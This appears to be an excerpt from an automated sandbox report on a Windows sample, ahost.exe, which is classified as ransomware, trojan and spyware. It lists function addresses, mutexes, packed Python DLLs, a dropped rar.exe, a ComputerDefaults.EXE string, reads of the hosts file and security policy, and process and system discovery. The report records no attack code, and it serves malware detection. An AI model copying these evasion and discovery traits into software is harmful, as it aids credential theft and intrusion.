Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F9200938	2_2_00007FF7F9200938
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91F8154	2_2_00007FF7F91F8154
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F920411C	2_2_00007FF7F920411C
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91F21D4	2_2_00007FF7F91F21D4
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91F19B4	2_2_00007FF7F91F19B4
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91F3A14	2_2_00007FF7F91F3A14
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F9203C80	2_2_00007FF7F9203C80
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91F2C80	2_2_00007FF7F91F2C80
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F9200938	2_2_00007FF7F9200938
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F9206488	2_2_00007FF7F9206488
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F9205C70	2_2_00007FF7F9205C70
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91EA4E4	2_2_00007FF7F91EA4E4
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91EA34B	2_2_00007FF7F91EA34B
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91F1BC0	2_2_00007FF7F91F1BC0
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91E8BD0	2_2_00007FF7F91E8BD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FF88509ACC5	12_2_00007FF88509ACC5
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8AAE10	104_2_00007FF7CF8AAE10
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF88ABA0	104_2_00007FF7CF88ABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8B7B24	104_2_00007FF7CF8B7B24
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF890A2C	104_2_00007FF7CF890A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF881884	104_2_00007FF7CF881884
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF88B540	104_2_00007FF7CF88B540
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8954C0	104_2_00007FF7CF8954C0
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8882F0	104_2_00007FF7CF8882F0
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF891180	104_2_00007FF7CF891180
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8E00F0	104_2_00007FF7CF8E00F0
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8A0104	104_2_00007FF7CF8A0104
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF893030	104_2_00007FF7CF893030
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8B8040	104_2_00007FF7CF8B8040
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8B0074	104_2_00007FF7CF8B0074
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8AC05C	104_2_00007FF7CF8AC05C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8C4FE8	104_2_00007FF7CF8C4FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8EDFD8	104_2_00007FF7CF8EDFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8BC00C	104_2_00007FF7CF8BC00C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8B5F4C	104_2_00007FF7CF8B5F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8EAF90	104_2_00007FF7CF8EAF90
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8CEEA4	104_2_00007FF7CF8CEEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8BAF0C	104_2_00007FF7CF8BAF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF889EFC	104_2_00007FF7CF889EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8CAE50	104_2_00007FF7CF8CAE50
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8DFE74	104_2_00007FF7CF8DFE74
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF898E68	104_2_00007FF7CF898E68
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF88CE84	104_2_00007FF7CF88CE84
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8D1DCC	104_2_00007FF7CF8D1DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF88EE08	104_2_00007FF7CF88EE08
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF891E04	104_2_00007FF7CF891E04
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8B0D20	104_2_00007FF7CF8B0D20
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8C9D74	104_2_00007FF7CF8C9D74
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8D6D0C	104_2_00007FF7CF8D6D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8A9D0C	104_2_00007FF7CF8A9D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF88DD04	104_2_00007FF7CF88DD04
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF898C30	104_2_00007FF7CF898C30
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8C5C8C	104_2_00007FF7CF8C5C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8D9B98	104_2_00007FF7CF8D9B98
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8C4B38	104_2_00007FF7CF8C4B38
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8EAAC0	104_2_00007FF7CF8EAAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF88CB14	104_2_00007FF7CF88CB14
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8C5A70	104_2_00007FF7CF8C5A70
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8BFA6C	104_2_00007FF7CF8BFA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8849B8	104_2_00007FF7CF8849B8
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8C69FD	104_2_00007FF7CF8C69FD
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8BD91C	104_2_00007FF7CF8BD91C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8AD97C	104_2_00007FF7CF8AD97C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8D18A8	104_2_00007FF7CF8D18A8
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8B38E8	104_2_00007FF7CF8B38E8
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8C190C	104_2_00007FF7CF8C190C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8B0904	104_2_00007FF7CF8B0904
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF892890	104_2_00007FF7CF892890
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF888884	104_2_00007FF7CF888884
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8917C8	104_2_00007FF7CF8917C8
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8A67E0	104_2_00007FF7CF8A67E0
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8E86D4	104_2_00007FF7CF8E86D4
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8986C4	104_2_00007FF7CF8986C4
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8BA710	104_2_00007FF7CF8BA710
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8C0710	104_2_00007FF7CF8C0710
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8C2700	104_2_00007FF7CF8C2700
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8D7660	104_2_00007FF7CF8D7660
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8AF5B0	104_2_00007FF7CF8AF5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF898598	104_2_00007FF7CF898598
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8BF59C	104_2_00007FF7CF8BF59C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8D260C	104_2_00007FF7CF8D260C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8B65FC	104_2_00007FF7CF8B65FC
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF88A504	104_2_00007FF7CF88A504
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8C5468	104_2_00007FF7CF8C5468
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8AD458	104_2_00007FF7CF8AD458
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8AC3E0	104_2_00007FF7CF8AC3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8D832C	104_2_00007FF7CF8D832C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8B0374	104_2_00007FF7CF8B0374
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF892360	104_2_00007FF7CF892360
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8C02A4	104_2_00007FF7CF8C02A4
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF89D2C0	104_2_00007FF7CF89D2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8842E0	104_2_00007FF7CF8842E0
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8D1314	104_2_00007FF7CF8D1314
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF89E21C	104_2_00007FF7CF89E21C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF88F24C	104_2_00007FF7CF88F24C
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8A7244	104_2_00007FF7CF8A7244
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8D2268	104_2_00007FF7CF8D2268
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8E41CC	104_2_00007FF7CF8E41CC
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8C81CC	104_2_00007FF7CF8C81CC
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8C2164	104_2_00007FF7CF8C2164

Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: String function: 00007FF7CF898444 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: String function: 00007FF7CF8C49F4 appears 53 times
Source: C:\Users\user\Desktop\ahost.exe	Code function: String function: 00007FF7F91E2710 appears 96 times

Source: ahost.exe

Static PE information: invalid certificate

Source: rar.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: ahost.exe	Binary or memory string: OriginalFilename vs ahost.exe
Source: ahost.exe, 00000000.00000000.1388991720.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameComputerDefaults.EXEj% vs ahost.exe
Source: ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs ahost.exe
Source: ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs ahost.exe
Source: ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs ahost.exe
Source: ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs ahost.exe
Source: ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs ahost.exe
Source: ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs ahost.exe
Source: ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs ahost.exe
Source: ahost.exe, 00000000.00000003.1389281652.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs ahost.exe
Source: ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs ahost.exe
Source: ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs ahost.exe
Source: ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs ahost.exe
Source: ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs ahost.exe
Source: ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs ahost.exe
Source: ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs ahost.exe
Source: ahost.exe	Binary or memory string: OriginalFilename vs ahost.exe
Source: ahost.exe, 00000002.00000002.1883236674.00007FF8F918C000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs ahost.exe
Source: ahost.exe, 00000002.00000002.1881100389.00007FF8E825A000.00000004.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs ahost.exe
Source: ahost.exe, 00000002.00000002.1880819429.00007FF8E8224000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs ahost.exe
Source: ahost.exe, 00000002.00000002.1878093732.00007FF8E72E9000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilenamelibsslH vs ahost.exe
Source: ahost.exe, 00000002.00000002.1882479474.00007FF8F7AA8000.00000004.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs ahost.exe
Source: ahost.exe, 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameComputerDefaults.EXEj% vs ahost.exe
Source: ahost.exe, 00000002.00000002.1878441091.00007FF8E7323000.00000004.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs ahost.exe
Source: ahost.exe, 00000002.00000002.1882181540.00007FF8F0D18000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs ahost.exe
Source: ahost.exe, 00000002.00000002.1877630099.00007FF8E7212000.00000004.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs ahost.exe
Source: ahost.exe, 00000002.00000002.1882788202.00007FF8F832A000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs ahost.exe
Source: ahost.exe, 00000002.00000002.1878851631.00007FF8E74AC000.00000004.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs ahost.exe
Source: ahost.exe, 00000002.00000002.1883016417.00007FF8F8CAC000.00000004.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs ahost.exe
Source: ahost.exe, 00000002.00000002.1880546446.00007FF8E7B05000.00000004.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamepython313.dll. vs ahost.exe
Source: ahost.exe, 00000002.00000002.1877130678.00007FF8E6C2A000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs ahost.exe
Source: ahost.exe, 00000002.00000002.1881798155.00007FF8E8406000.00000004.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs ahost.exe
Source: ahost.exe, 00000002.00000002.1881428893.00007FF8E8393000.00000004.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs ahost.exe
Source: ahost.exe	Binary or memory string: OriginalFilenameComputerDefaults.EXEj% vs ahost.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

Source: C:\Users\user\Desktop\ahost.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\ahost.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: libcrypto-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
Source: libssl-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
Source: python313.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9994153529876473
Source: sqlite3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9975483390549273
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9926987474437627

Source: classification engine

Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@196/60@4/3

Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe

Code function: 104_2_00007FF7CF89CAFC GetLastError,FormatMessageW,

104_2_00007FF7CF89CAFC

Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF89EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		104_2_00007FF7CF89EF50
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8CB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,		104_2_00007FF7CF8CB57C

Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe

Code function: 104_2_00007FF7CF8A3144 GetDiskFreeSpaceExW,

104_2_00007FF7CF8A3144

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:988:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4660:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
Source: C:\Users\user\Desktop\ahost.exe	Mutant created: \Sessions\1\BaseNamedObjects\w
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2308:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03

Source: C:\Users\user\Desktop\ahost.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI72722

Jump to behavior

Source: ahost.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\ahost.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\ahost.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

